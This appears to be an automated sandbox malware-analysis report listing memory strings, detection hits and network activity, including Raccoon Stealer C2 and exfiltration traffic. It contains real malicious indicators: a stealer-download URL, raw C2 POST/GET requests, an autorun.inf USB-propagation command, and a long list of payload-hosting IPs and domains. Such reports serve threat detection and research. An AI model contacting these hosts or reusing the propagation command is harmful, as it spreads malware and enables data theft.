Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: :\Autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp Binary or memory string: [autorun]
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp Binary or memory string: copy%hty1%autorun.inf%%i:&attrib+r+s+h%%i:\autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp Binary or memory string: 8copy%hty1%autorun.inf%%i:&attrib+r+s+h%%i:\autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18272436681.0000021B5E9EB000.00000004.00000001.sdmp Binary or memory string: SCPT:AutorunSCPT:Autorun.executeautorun.infSCPT:Autorun.execute.shopenSHELL\OPEN\COMMAND
Source: MpSigStub.exe, 0000000B.00000003.18272436681.0000021B5E9EB000.00000004.00000001.sdmp Binary or memory string: nSCPT:Autorun.execute.shexec[autorun]action=open folder to view filesaction=abrir carpeta para ver los archivosshellexecute=icon=%systemroot%\system32\shell32.dll,4useautoplay=1[autorun]
Source: MpSigStub.exe, 0000000B.00000003.18299651733.0000021B5E105000.00000004.00000001.sdmp Binary or memory string: ;&lt;br/&gt;[autorun]&lt;br/&gt;open=terserah.exe&lt;br/&gt;shellexecute=terserah.exe&lt;br/&gt;action=openfoldert
Source: MpSigStub.exe, 0000000B.00000003.18299651733.0000021B5E105000.00000004.00000001.sdmp Binary or memory string: t;&lt;br/&gt;[autorun]&lt;br/&gt;open=terserah.exe&lt;br/&gt;shellexecute=terserah.exe&lt;br/&gt;action=openfoldert
Source: MpSigStub.exe, 0000000B.00000003.18278560090.0000021B5F382000.00000004.00000001.sdmp Binary or memory string: %windir%\system32\win.dll\reg.bkp\autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp Binary or memory string: %c:\AUTORUN.INF
Source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp Binary or memory string: autorun.infx
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpavdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File opened: C:\Windows\SERVIC~1\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30AB030 FindNextFileW,FindClose,FindFirstFileW, 18_2_00007FF7E30AB030
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30AADEC FindFirstFileW,FindNextFileW,FindClose,FindClose, 18_2_00007FF7E30AADEC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30D2504 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 18_2_00007FF7E30D2504
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E305F810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle, 18_2_00007FF7E305F810

Networking:

Yara detected PasteDownloader
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.11.20:49817 -> 5.181.156.229:80
Source: Traffic Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.11.20:49817 -> 5.181.156.229:80
Found Tor onion address
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: https://djdkduep62kz4nzx.onion.to/
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: $https://djdkduep62kz4nzx.onion.to/
Uses dynamic DNS services
Source: unknown DNS query: name: sopage.duckdns.org
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://sopage.duckdns.org/Solex-RacoonStealer_JCgunCl163.bin
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /teneleven11pro HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: telemirror.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 5.181.156.229
Source: global traffic HTTP traffic detected: GET //l/f/7pUkcnwB3dP17Spz8PbZ/5bb145f546aab946dfee3a86c4ed4aae2eb77748 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 5.181.156.229
Source: global traffic HTTP traffic detected: GET //l/f/7pUkcnwB3dP17Spz8PbZ/32442f5e2baf805844c1826e7816dd9d68ef3ddc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 5.181.156.229
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 53168Host: 5.181.156.229
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 12 Oct 2021 01:36:36 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytes
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /Solex-RacoonStealer_JCgunCl163.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: sopage.duckdns.orgCache-Control: no-cache
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: MIVOCLOUDMD MIVOCLOUDMD
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 23.146.242.85 23.146.242.85
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: HTTP://www.EEEEEEE.EEE
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%%PingRtt%%/t.ashx
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://%76%2E%79%61%6F%36%33%2E%63%6F%6D/url.asp
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://%76%2E%79%61%6F%36%33%2E%63%6F%6D/url.asp%C5%E4%D6%C3%D0%C5%CF%A2
Source: MpSigStub.exe, 0000000B.00000003.18312668027.0000021B5E551000.00000004.00000001.sdmp String found in binary or memory: http://%HOST%/client/install.htm?cid=%CID%
Source: MpSigStub.exe, 0000000B.00000003.18312668027.0000021B5E551000.00000004.00000001.sdmp String found in binary or memory: http://%HOST%/client/open.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 0000000B.00000003.18312668027.0000021B5E551000.00000004.00000001.sdmp String found in binary or memory: http://%HOST%/client/run.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 0000000B.00000003.18312668027.0000021B5E551000.00000004.00000001.sdmp String found in binary or memory: http://%HOST%/client/scan.htm?GUID=%GUID%&cid=%CID%x
Source: MpSigStub.exe, 0000000B.00000003.18312668027.0000021B5E551000.00000004.00000001.sdmp String found in binary or memory: http://%HOST%/client/uninstall.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 0000000B.00000003.18312668027.0000021B5E551000.00000004.00000001.sdmp String found in binary or memory: http://%HOST%/client/update.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%S/upload.php
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://%d.%d.%d.%d:3128/
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp String found in binary or memory: http://%d.ctrl.%s
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp String found in binary or memory: http://%d.ctrl.%saf
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://%domain%/config.php
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://%domain%/content.php?se_id=%d&q=%s&page=%s&ua=%s&al=%s&aff_id=%s&sub_id=%s
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://%domain%/update.php
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://%domain%/update.phpa
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s.%s/APP/download.php?m=%s&d=%s&a=%s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s.%s/APP/download.php?m=%s&d=%s&a=%sa
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s.%s/APP/loading.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/?aid=%shttp://%s/sync.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/any2/%s-direct.ex
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/any2/%s-direct.exx
Source: MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp String found in binary or memory: http://%s/asghfd.php?&&u=%u&p=%u&lang
Source: MpSigStub.exe, 0000000B.00000003.18279241647.0000021B5F9D1000.00000004.00000001.sdmp String found in binary or memory: http://46.243.136.238/
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://4udating.net
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: http://5.135.73.116/win/document_0120200.doc
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp String found in binary or memory: http://5.34.180.57/44313
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://5.39.217.221/win/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://50.63.128.
Source: MpSigStub.exe, 0000000B.00000003.18275295752.0000021B5E8EE000.00000004.00000001.sdmp String found in binary or memory: http://51.254.164.244/
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://51.81.114.167:
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://513389.cn/
Source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp String found in binary or memory: http://54.214.246.97/log/SilentUpdater7/install
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://54.237.176.95/z2.php?a=%s&b=%d&c=%d&d=%d&e=%d&f=%d&g=%s&h=%d&i=%d&z=%d&y=%d
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://54.237.176.95/z2.php?a=%s&b=%d&c=%d&d=%d&e=%d&f=%d&g=%s&h=%d&i=%d&z=%d&y=%dx
Source: MpSigStub.exe, 0000000B.00000003.18280918595.0000021B5F1EB000.00000004.00000001.sdmp String found in binary or memory: http://56489.eu5.org
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://58.65.235.3/up/get_exa.php?l=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://58.65.239.124/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://58.65.239.82
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://5starvideos.com/main/
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://5starvideos.com/main/K
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://5starvideos.com/main/K5
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://61.135.159.183/installer/sobar.exe
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://61.19.253.
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://62.109.31.216/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://62.210.214.
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://63.219.176.248/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://63.219.178.162/
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://63.219.178.162/CFL/
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://63.219.178.162/EX/
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://63.219.178.162/EX/x
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://63.219.178.162/K/F
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://63.219.178.162/NL2/?w=
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp String found in binary or memory: http://64.156.31.
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://64.27.0.205
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://64.27.0.205/up/calc2.bin
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://65.243.103.
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://65.243.103.58/trafc-2/rfe.php
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://65.243.103.58/trafc-2/rfe.phpg
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://65.243.103.80/80
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://66.40.9.246/binaries
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://66.98.138.92/PH/
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: http://67.15.
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://67.18.111.82:8088
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://67.210.122.222/~turks/lego/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://68.178.225.162
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://69.31.80.
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://69.31.84.223/
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp String found in binary or memory: http://69.50.164.11/v1/mh.php?pid=%s&cid=%s&p=%s&t=%s&vh=%i&vt=%i
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://6tof.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18278560090.0000021B5F382000.00000004.00000001.sdmp String found in binary or memory: http://7-.j-z-0-3-0-u-u-x-f-1l-3-l-h-w-b-q-z-u-5-n-l-l-m-s-5-v-s-z-g.info
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://75.127.1.211/hkcmd/document.doc
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://76h1.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://77.81.225.138/carnaval2017.zip
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://78.128.92.26/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://78.157.143.251
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: http://78.24.220.183/
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://79.110.52.186/fide/f.wbk
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://79.110.52.186/naki/n.wbk
Source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp String found in binary or memory: http://8.8.8.8/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://80.69.160.
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://81.16.141.208/q37kkp
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://82.118.23.186/
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://82.98.119.68/wp-admin/app/alim.doc
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: http://82.98.119.68/wp-admin/app/updates.doc
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://82.98.235.
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://82.98.235.63/cgi-bin/check/autoaff3
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: http://83.136.232.110/44285
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://83.149.75.54/cgi-bin
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://83.166.242.164/desktop-st7lsde/
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: http://83.166.242.164/desktop-st7lsde/bid/relay.dot
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://83.166.242.164/desktop-st7lsde/nay.dot
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://83.166.246.59/sgz2/rejoice/lowered.dot
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://85.17.138.60
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://85.17.138.60/mpgcodec/codec.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://85.17.138.60/traf/fg.php
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://85.17.3.151/cgi-bin
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://85.17.93.189/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://85.17.93.189/iddq/m
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://85.234.191.170/inst.php?id=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://85.234.191.a7
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://85.255.11
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://85.255.119
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://85.255.11http://ad.eltext.comhttp://ad.tuzikmedia.biz.rsrc
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://88.208.17.127/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://89.188.16.
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://89.188.16.18/
Source: MpSigStub.exe, 0000000B.00000003.18269858527.0000021B5F43D000.00000004.00000001.sdmp String found in binary or memory: http://89.45.14.196/p1/server
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://8nasrcity.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://91.196.216.30/counter.php
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://92.222.7.
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://92.38.135.46/43cfqysryip51zzq.php
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://92.63.197.106/c.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://92.63.197.153/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://92.63.197.60/c.exe
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: http://93.189.43.3/kinsingchmod
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://94.102.14.
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://94.103.85.236/ds/11.gif
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://94.23.210.144/promo/promo.php
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://94.23.39.156/fakeav/files.php?jsoncallback=?
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp String found in binary or memory: http://94.75.
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://95.173.183.
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://95.46.99.199/template.doc
Source: MpSigStub.exe, 0000000B.00000003.18277664161.0000021B5E0C2000.00000004.00000001.sdmp String found in binary or memory: http://95.64.47.164/
Source: MpSigStub.exe, 0000000B.00000003.18277664161.0000021B5E0C2000.00000004.00000001.sdmp String found in binary or memory: http://95.64.47.164/_
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://95.64.47.164/index.php?
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://9ifz.org/2345
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://9o0gle.com/
Source: MpSigStub.exe, 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp String found in binary or memory: http://Andrei512.narod.ru
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp String found in binary or memory: http://YOURSITE.com/bot.exea
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://a-search.biz/&
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://a.pomf.cat/
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://a.pomf.cat/zjiqnx.html
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://a.pomfe.co/hnwila.xml
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://a.up-00.com/
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://a0571310.xsph.ru/djfklvk/revert.php
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://a1us6j2z.recordgate.co
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://a1us6j2z.recordgate.coS&
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://a1us6j2z.recordgate.com/vnmsq40nj1q7a.php?30/receivetimeout30/connecttimeout/silent
Source: MpSigStub.exe, 0000000B.00000003.18312990479.0000021B5F514000.00000004.00000001.sdmp String found in binary or memory: http://aaacollectionsjewelry.com/x9djsa
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://aancyber77.blogspot.com/
